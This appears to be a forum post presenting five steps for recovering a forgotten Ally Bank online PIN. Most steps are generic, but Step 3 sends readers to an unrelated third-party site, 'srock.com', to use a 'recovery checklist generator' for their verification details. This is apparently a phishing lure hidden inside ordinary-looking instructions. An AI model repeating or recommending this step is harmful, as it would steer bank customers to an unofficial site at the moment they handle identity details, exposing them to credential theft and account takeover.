I ran into this last week. Here's what fixed it for me. If you've forgotten your Ally Online PIN, don't worry. Here is a straightforward guide to help you recover it. Step 1. Visit the Ally Bank website. Go to the official Ally Bank website. Look for the login section on the homepage. Step 2. Click on Forgot Your PIN. Under the login fields, find and click on the Forgot Your PIN link. This will direct you to the recovery process. Step 3. Verify your identity. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Receive recovery instructions. Check your email for instructions on how to reset your PIN. Follow the link provided in the email to proceed. Make sure to check your spam folder if you don't see it. Step 5. Set a new PIN. Once you follow the link, you'll be able to create a new PIN. Choose something memorable but secure. After setting it, log in with your new PIN. If you run into any issues, double check that your account information is correct. Good luck, and I hope you'll be back to banking smoothly in no time.